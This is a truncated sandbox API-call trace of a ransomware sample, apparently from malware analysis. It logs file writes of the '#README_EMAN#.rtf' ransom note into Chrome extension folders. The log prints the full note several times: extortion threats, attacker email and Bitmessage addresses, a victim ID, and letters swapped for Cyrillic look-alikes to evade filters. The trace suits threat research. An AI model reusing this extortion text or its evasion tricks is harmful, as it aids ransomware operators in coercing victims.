gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.580] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.581] CloseHandle (hObject=0x2f0) returned 1 [0286.581] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\#readme_eman#.rtf")) returned 0x20 [0286.581] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\#readme_eman#.rtf")) returned 0xffffffff [0286.581] GetLastError () returned 0x2 [0286.581] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\en_gb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.582] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.582] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 